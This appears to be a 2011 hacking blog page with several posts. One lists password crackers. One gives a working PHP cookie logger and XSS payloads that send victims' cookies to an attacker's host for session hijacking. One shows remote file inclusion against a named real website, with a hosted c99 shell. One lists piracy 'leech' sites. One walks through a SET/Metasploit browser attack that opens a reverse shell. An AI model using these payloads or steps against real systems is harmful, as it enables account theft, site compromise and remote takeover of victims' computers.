Saturday, July 16, 2011

Best password breakers/crackers









The best password crackers. The list made from all password brealkers from all over the globe including versions from unix and widnows as well.


1. Cain and Abel : The top password recovery tool for Windows

UNIX users often smugly assert that the best free security tools support their platform first, and Windows ports are often an afterthought. They are usually right, but Cain & Abel is a glaring exception. This Windows-only password recovery tool handles an enormous variety of tasks. It can recover passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, revealing password boxes, uncovering cached passwords and analyzing routing protocols

2. John the Ripper : A powerful, flexible, and fast multi-platform password hash cracker

John the Ripper is a fast password cracker, currently available for many flavors of Unix (11 are officially supported, not counting different architectures), DOS, Win32, BeOS, and OpenVMS. Its primary purpose is to detect weak Unix passwords. It supports several crypt(3) password hash types which are most commonly found on various Unix flavors, as well as Kerberos AFS and Windows NT/2000/XP LM hashes

3. THC Hydra : A Fast network authentication cracker which support many different services

When you need to brute force crack a remote authentication service, Hydra is often the tool of choice. It can perform rapid dictionary attacks against more then 30 protocols, including telnet, ftp, http, https, smb, several databases, and much more

4. Aircrack : The fastest available WEP/WPA cracking tool

Aircrack is a suite of tools for 802.11a/b/g WEP and WPA cracking. It can recover a 40 through 512-bit WEP key once enough encrypted packets have been gathered. It can also attack WPA 1 or 2 networks using advanced cryptographic methods or by brute force. The suite includes airodump (an 802.11 packet capture program), aireplay (an 802.11 packet injection program), aircrack (static WEP and WPA-PSK cracking), and airdecap (decrypts WEP/WPA capture files)

5. L0phtcrack : Windows password auditing and recovery application

L0phtCrack, also known as LC5, attempts to crack Windows passwords from hashes which it can obtain (given proper access) from stand-alone Windows NT/2000 workstations, networked servers, primary domain controllers, or Active Directory. In some cases it can sniff the hashes off the wire. It also has numerous methods of generating password guesses (dictionary, brute force, etc). LC5 was discontinued by Symantec in 2006, but you can still find the LC5 installer floating around. The free trial only lasts 15 days, and Symantec won't sell you a key, so you'll either have to cease using it or find a key generator. Since it is no longer maintained, you are probably better off trying Cain and Abel, John the Ripper, or Ophcrack instead.

6. Airsnort : 802.11 WEP Encryption Cracking Tool

AirSnort is a wireless LAN (WLAN) tool that recovers encryption keys. It was developed by the Shmoo Group and operates by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. You may also be interested in the similar Aircrack.

7. SolarWinds : A plethora of network discovery/monitoring/attack tools

SolarWinds has created and sells dozens of special-purpose tools targeted at systems administrators. Security-related tools include many network discovery scanners, an SNMP brute-force cracker, router password decryption, a TCP connection reset program, one of the fastest and easiest router config download/upload applications available and more.

8. Pwdump : A window password recovery tool

Pwdump is able to extract NTLM and LanMan hashes from a Windows target, regardless of whether Syskey is enabled. It is also capable of displaying password histories if they are available. It outputs the data in L0phtcrack-compatible form, and can write to an output file.

9. RainbowCrack : An Innovative Password Hash Cracker

The RainbowCrack tool is a hash cracker that makes use of a large-scale time-memory trade-off. A traditional brute force cracker tries all possible plaintexts one by one, which can be time consuming for complex passwords. RainbowCrack uses a time-memory trade-off to do all the cracking-time computation in advance and store the results in so-called "rainbow tables". It does take a long time to precompute the tables but RainbowCrack can be hundreds of times faster than a brute force cracker once the precomputation is finished.

10 Brutus : A network brute-force authentication cracker

This Windows-only cracker bangs against network services of remote systems trying to guess passwords by using a dictionary and permutations thereof. It supports HTTP, POP3, FTP, SMB, TELNET, IMAP, NTP, and more. No source code is available. UNIX users should take a look at THC Hydra.

Session hijacking or cookie stealing using php and javascript


In computer science, session hijacking refers to the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server. It has particular relevance to web developers, as the HTTP cookies used to maintain a session on many web sites can be easily stolen by an attacker using an intermediary computer or with access to the saved cookies on the victim's computer (see HTTP cookie theft).


Here we show how you can hack a session using javascript and php.


What is a cookie?


A cookie known as a web cookie or http cookie is a small piece of text stored by the user browser.A cookie is sent as an header by the web server to the web browser on the client side.A cookie is static and is sent back by the browser unchanged everytime it accesses the server.
A cookie has a expiration time that is set by the server and are deleted automatically after the expiration time.
Cookie is used to maintain users authentication and to implement shopping cart during his navigation,possibly across multiple visits.


What can we do after stealing cookie?


Well,as we know web sites authenticate their user's with a cookie,it can be used to hijack the victims session.The victims stolen cookie can be replaced with our cookie to hijack his session.


This is a cookie stealing script that steals the cookies of a user and store them in a text file, these cookied can later be utilised.


PHP Code:
<?php


function GetIP()
{
if (getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown"))
$ip = getenv("HTTP_CLIENT_IP");
else if (getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown"))
$ip = getenv("HTTP_X_FORWARDED_FOR");
else if (getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown"))
$ip = getenv("REMOTE_ADDR");
else if (isset($_SERVER['REMOTE_ADDR']) && $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'], "unknown"))
$ip = $_SERVER['REMOTE_ADDR'];
else
$ip = "unknown";
return($ip);
}


function logData()
{
$ipLog="log.txt";
$cookie = $_SERVER['QUERY_STRING'];
$register_globals = (bool) ini_get('register_gobals');
if ($register_globals) $ip = getenv('REMOTE_ADDR');
else $ip = GetIP();


$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$rqst_method = $_SERVER['METHOD'];
$rem_host = $_SERVER['REMOTE_HOST'];
$referer = $_SERVER['HTTP_REFERER'];
$date=date ("l dS of F Y h:i:s A");
$log=fopen("$ipLog", "a+");


if (preg_match("/\bhtm\b/i", $ipLog) || preg_match("/\bhtml\b/i", $ipLog))
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : } $date | COOKIE: $cookie
");
else
fputs($log, "IP: $ip | PORT: $rem_port | HOST: $rem_host | Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE: $date | COOKIE: $cookie \n\n");
fclose($log);
}


logData();


?>


Save the script as a cookielogger.php on your server.
(You can get any free webhosting easily such as justfree,x10hosting etc..)


Create an empty text file log.txt in the same directory on the webserver. The hijacked/hacked cookies will be automatically stored here.


Now for the hack to work we have to inject this piece of javascript into the target's page. This can be done by adding a link in the comments page which allows users to add hyperlinks etc. But beware some sites dont allow javascript so you gotta be lucky to try this.


The best way is to look for user interactive sites which contain comments or forums.


Post the following code which invokes or activates the cookielogger on your host.


Code:
<script language="Java script">
document.location="http://www.yourhost.com/cookielogger.php?cookie=&quot; + document.cookie;
</script>


Your can also trick the victim into clicking a link that activates javascript.
Below is the code which has to be posted.


Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;">Click here!</a>


Clicking an image also can activate the script.For this purpose you can use the below code.


Code:
<a href="java script:document.location='http://www.yourhost.com/cookielogger.php?cookie='+document.cookie;"&gt;


<img src="URL OF THE IMAGE"/></a>


All the details like cookie,ipaddress,browser of the victim are logged in to log.txt on your hostserver


In the above codes please remove the space in between javascript.


Hijacking the Session:


Now we have cookie,what to do with this..?
Download cookie editor mozilla plugin or you may find other plugins as well.


Go to the target site-->open cookie editor-->Replace the cookie with the stolen cookie of the victim and refresh the page.Thats it!!!you should now be in his account. Download cookie editor mozilla plugin from here : https://addons.mozilla.org/en-US/firefox/addon/573


Thursday, July 14, 2011

Hack a Website Using Remote File Inclusion





Remote file inclusion is basically a one of the most common vulnerability found in web application. This type of vulnerability allows the Hacker or attacker to add a remote file on the web server. If the attacker gets successful in performing the attack he/she will gain access to the web server and hence can execute any command on it.....

Searching the Vulnerability

Remote File inclusion vulnerability is usually occured in those sites which have a navigation similar to the below one

www.Targetsite.com/index.php?page=Anything

To find the vulnerability the hacker will most commonly use the following Google Dork

“inurl:index.php?page=”

This will show all the pages which has “index.php?page=” in their URL, Now to test whether the website is vulnerable to Remote file Inclusion or not the hacker use the following command

www.targetsite.com/index.php?page=www.google.com

Lets say that the target website is http://www.cbspk.com/

So the hacker url will become

http://www.cbspk.com/v2/index.php?page=http://www.google.com



If after executing the command the homepage of the google shows up then then the website is vulnerable to this attack if it does not come up then you should look for a new target. In my case after executing the above command in the address bar Google homepage shows up indicating that the website is vulnerable to this attack

Now the hacker would upload the shells to gain access. The most common shells used are c99 shell or r57 shell. I would use c99 shell. You can download c99 shell from the link below:

http://www.4shared.com/file/107930574/287131f0/c99shell.html?aff=7637829

The hacker would first upload the shells to a webhosting site such as ripway . com, 110mb . com etc.

Now here is how a hacker would execute the shells to gain access. Lets say that the url of the shell is

http://h1.ripway.com/rafaybaloch/c99.txt

Now here is how a hacker would execute the following command to gain access

http://www.cbspk.com/v2/index.php?page=http://h1.ripway.com/rafaybaloch/c99.txt?

Remember to add “?” at the end of url or else the shell will not execute. Now the hacker is inside the website and he could do anything with it

Fast leech generator







███████████████████████████████████████
file download is boring in rapid share, mega upload,hot file & all in similar sites.
so i found some cool sites that will generate your regular download link into premium !
chk out ths links....... some link may not work try others.. dun forget to share blog :)
███████████████████████████████████████
» http://www.hlusoe.info/rapidshare 


» http://www.hlusoe.info/megaupload


» http://www.hlusoe.info/hotfile


» http://www.hlusoe.info/storageto


» http://www.hlusoe.info/uploading


» http://www.hlusoe.info/fileserve


» http://visbb.com/


» http://rsleecher.me/


» http://www.downloadpremium.in/


» http://www.aalireza.website.org/


» http://www.vutuananh.com/rapid/


» http://www.power-dll.com/


» http://maimaiyeui.com/rs/


» http://www.freerapidshareleech.com/


» http://www.bajagratis.tk/


» http://www.publicleecher.cz.cc/


» http://rapidex.co.cc/


» http://www.moxer.co.cc/


» http://www.magon.co.cc/


» http://rapid115.com/


» http://premium.nextube.org/


» http://mystikmomo.free.fr/rapidleech/


» http://leech4url.co.cc/


» http://karok.net.previewmysite.com/


» http://www.warezpoint.info/


» http://www.warezrocker-leecher.info/


» http://www.botcollector.com/_marathon/leechfile/


» http://leech.class07ct113.com/


» http://www.linkregenerator.us/


» http://www.speedytoys.net/loivedoncoi/


» http://www.24honline.net/rapidleech/


» http://nyuu.tk/leech/


» http://nyaweb.co.cc/leech/


» http://talegaleech.com/leech/


» http://www.nsie.tk/leech/


» http://www.eisn.tk/leech/


» http://www.foxleech.com/


» http://www.rsdad.com/index.php


» http://lunex.info/


» http://zleech.com/


» http://www.onleech.net/


» http://tom.x-files.lv/R/


» http://mccallbrewery.com/


» http://www.parsiancompany.com/


» http://premiumaz.com/leech/


» http://03134f9.netsolhost.com/r322/


» http://66.197.161.117/r322/


» http://bajandogratis.com/


» http://memory.dovantuyen.info/


» http://www.descargasfull.com/


» http://rapidleech.ir/


» http://poyadl.ir/mamali2/


» http://gawalmasr.com/RL/


» http://leech.deeplabs.org/


» http://nahwu.info/


» http://rl.op3l.us/index.php


» http://www.hishareserver1.powa.fr/


» http://fullpremium.net/


» http://www.rapidshot.info/


» http://blackcrysis.de/rs/


» http://hbleech.com


» http://frendzleech.com


» http://rapid8.com


» http://rapidgen.net


» www.rapidthe.net/


» www.premiumlinkgenerator.net/


» www.hfplg.com/


» www.megapid.com


» rsplg.com/


» rapidshare-premium-link-generator.com/


» rapidrar.com/


» www.megafast.info/


» www.gigaleecher.com/


» www.rsmaker.com/


» www.rsmaker.com/


» www.rsfox.com/


» www.hlusoe.info/


» www.megauploadpremiumlinkgenerator.org/


» http://easyrleech.tk/


» http://www.descargasrapidshare.com/


» http://www.rapidsharegratis.com/


» http://www.rapidsharefreedownloads.com/


» http://downloadspremium.com/


» http://www.degitalinfo.com/uchm/


» http://rapidleech2010.cz.cc/


» http://www.gigaleecher.com/


» http://www.leechking.com/


» http://www.fastnfree4u.net/


» http://youleech.net/


» http://lunex.mrbrenna.com/


» http://shot.rewaz.co.cc/


» http://public.rapidgen.net/


» http://www.megaleech.eu/


» http://www.megaleech.us/


» http://rsplg.com/


» http://muplg.com/


» http://hfplg.com/

Wednesday, July 13, 2011

HACKING WINDOWS USING SET AND BACKTRACK 5



What is Social Engineering Toolkit ?
The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly became a standard tool in a penetration testers arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test.


Actually this hacking method will works perfectly with DNS spoofing or Man in the Middle Attack method. Here in this tutorial I’m only write how-to and step-by-step to perform the basic attack, but for the rest you can modified it with your own imagination.  


In this tutorial we will see how this attack methods can owned your computer in just a few steps…
The success possibility of this attack depend on victim browser. If the victim never update their browser, the possibility can be 85% or more. 


Requirement : 
1.  Backtrack 5 or Backtrack 4


Step By Step : 
1. Change your work directory into /pentest/exploits/set/ 




2. Open Social Engineering Toolkit (SET) ./set and then choose "Website Attack Vectors" because we will attack victim via internet browser. Also in this attack we will attack via website generated by Social Engineering Toolkit to open by victim, so choose "Website Attack Vectors" for this options. 




3. Usually when user open a website, sometimes they don't think that they are opening suspicious website that including malicious script to harm their computer. In this option we will choose "The Metasploit Browser Exploit Method" because we will attack via victim browser. 




4. The next step just choose "Web Templates", because we will use the most famous website around the world that already provided by this Social Engineering Toolkit tools. 




5. There are 4 website templates Ready To Use for this attack methods, such as GMail, Google, Facebook, and Twitter. In this tutorial I will use Google, but if you think Facebook or Twitter more better because it's the most accessed website, just change into what do you want. 




6. For the next step…because we didn't know what kind of vulnerability that successfully attack the victim and what type of browser, etc, in this option we just choose "Metasploit Browser Autopwn" to load all vulnerability Social Engineering Toolkit known. This tools will launch all exploit in Social Engineering Toolkit database. 




7. For payload options selection I prefer the most use Windows Shell Reverse_TCP, but you also can choose the other 
payload that most comfortable for you






8. The next step is set up the Connect back port to attacker computer. In this example I use port 4444, but you can change to 1234, 4321, etc 







9. The next step just wait until all process completed and also wait until the server running. 










10. When the link given to user, the victim will see looks-a-like Google (fake website). When the page loads it also load all malicious script to attack victim computer. 






11. In attacker computer if there's any vulnerability in victim computer browser it will return sessions value that mean the exploit successfully attacking victim computer. In this case the exploit create new fake process named "Notepad.exe". 











12. To view active sessions that already opened by the exploit type "sessions -l" for listing an active sessions. Take a look to the ID…we will use that ID to connect to victim computer. 





13. To interract and connect to victim computer use command "sessions -i ID". ID is numerical value that given when you do sessions -l. For example you can see example in picture below. 






14. Victim computer already owned. I'm practice to create this tutorial using Virtual Machine so it will not harm other computer and also you can doing a lot of experience with your OS.




Related Posts Plugin for WordPress, Blogger...

IP info

hAckRich

Tags

study (19) education (18) coding (11) Codes (9) ciphers (9) cryptology (9) CRYPTOGRAPHY (8) Hacking Tutorials (5) Ethical hacker/hacking (4) Exploits and Incident Handling (4) HACKING WINDOWS (4) Make A Cipher (4) Windows (4) password breakers/crackers (4) Dictionary (3) Ebook (3) Facebook (3) Facebook Emoticons (3) Google Dork (3) Google Hacks (3) facebook symbols (3) php hack (3) tools (3) ASCII art (2) Facebook Animated Gif Image Status (2) GRE (2) GRE Dictionary (2) Hack a Website (2) IELTS (2) Java: A Beginner's Guide (2) Password Cracking (2) Password Recovery (2) SOCIAL ENGINEERING TOOLKIT (2) Session hijacking (2) find the vulnerability (2) java (2) password-auditing (2) password-cracker (2) php (2) Abel (1) Backtrack 5 (1) Barron’s GRE word list (1) Breaking Ciphers (1) CIPHERTEXT (1) CRYPTANALYSIS (1) Caesar's Shift Cipher (1) Cain (1) Cain and Abel (1) Crypters Binders RC4 (1) DOS (1) Facebook Chat Text Generator (1) Fast leech generator (1) Hacking Tools (1) HconSTF (1) List of best anonymizers (1) Make fake virus (1) Number Shift Cipher (1) One Pig's Pen (1) RFI (1) Remote file inclusion (1) SEO (1) SQL injection (1) Security 504 Hacker Techniques (1) Steal/trace ip (1) The Key (1) The Rail Fences (1) Toefl (1) Uses of proxy server (1) Virus (1) Vocabulary Word List (1) Winding Way Cipher (1) blog tips (1) brute force (1) brute forcing. (1) brutus (1) brutus-aet2 (1) brutus-aet2.zip (1) brutus-password-cracker (1) bypass web-filters (1) chat (1) command prompt (1) cookie stealing (1) crackers (1) e (1) fast download (1) hacking-software (1) hot file (1) improve site (1) ip catcher (1) ip tracker (1) leech (1) leecher (1) list of proxy servers (1) mail (1) mega upload (1) mobile (1) network-sniffing (1) rapid share (1) regular download link into premium (1) serial keys 94fbr (1) symbols (1) th3j35t3r's DOS tool (1)

Hackrich

welcome

☁ Partners Link Cloud ☁